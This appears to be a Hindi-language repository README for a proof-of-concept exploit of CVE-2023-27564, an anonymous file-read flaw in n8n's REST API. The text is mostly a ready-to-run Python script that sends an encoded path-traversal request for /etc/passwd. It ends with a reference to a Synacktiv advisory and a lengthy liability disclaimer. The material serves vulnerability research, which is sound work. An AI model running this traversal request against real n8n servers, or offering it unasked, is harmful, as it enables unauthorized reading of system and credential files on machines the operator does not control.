
CVE-2023-27564 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट जो n8n में REST API में पथ ट्रैवर्सल के माध्यम से अनाम फ़ाइल पढ़ने में सक्षम बनाता है। सुरक्षा अनुसंधान और भेद्यता मूल्यांकन के लिए अभिप्रेत है।
यह भेद्यता n8n में अनाम फ़ाइल पढ़ने की अनुमति देती है।
import requests
url = "https://example.com/rest/data/filesystem:..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd:.svg"
response = requests.get(url)
print(response.status_code)
print(response.headers)
print(response.text)
https://www.synacktiv.com/sites/default/files/2023-05/Synacktiv-N8N-Multiple-Vulnerabilities_0.pdf
इस रिपॉजिटरी में प्रदान किया गया प्रूफ ऑफ कॉन्सेप्ट (PoC) केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए है। जानकारी और कोड का उपयोग साइबर सुरक्षा पेशेवरों और शोधकर्ताओं द्वारा सॉफ्टवेयर और सिस्टम में भेद्यताओं को समझने और उनसे बचाव के लिए किया जाना है। पूर्व आपसी सहमति के बिना लक्ष्यों पर हमला करने के लिए इस PoC, संबंधित जानकारी या कोड का कोई भी उपयोग अवैध है और सख्त वर्जित है।
इस PoC का उपयोग करके, आप सहमत हैं कि आप इसके द्वारा प्रदर्शित भेद्यता के संभावित प्रभाव को समझते हैं और इसका जिम्मेदारीपूर्वक और नैतिक रूप से उपयोग करेंगे। इस PoC के लेखक इस सामग्री के किसी भी दुरुपयोग या प्रदान की गई जानकारी और कोड के उपयोग से होने वाली किसी भी क्षति के लिए किसी भी देयता से इनकार करते हैं। सभी लागू स्थानीय, राज्य, राष्ट्रीय और अंतर्राष्ट्रीय कानूनों का पालन करना अंतिम उपयोगकर्ता की जिम्मेदारी है।
लेखकों ने इस रिपॉजिटरी में प्रदान की गई जानकारी की सटीकता और विश्वसनीयता सुनिश्चित करने के लिए हर संभव प्रयास किया है। हालांकि, जानकारी बिना किसी प्रकार की वारंटी के "जैसी है" प्रदान की गई है। लेखक निहित जानकारी की सटीकता, सामग्री, पूर्णता, वैधता या विश्वसनीयता के लिए कोई जिम्मेदारी या देयता स्वीकार नहीं करते हैं।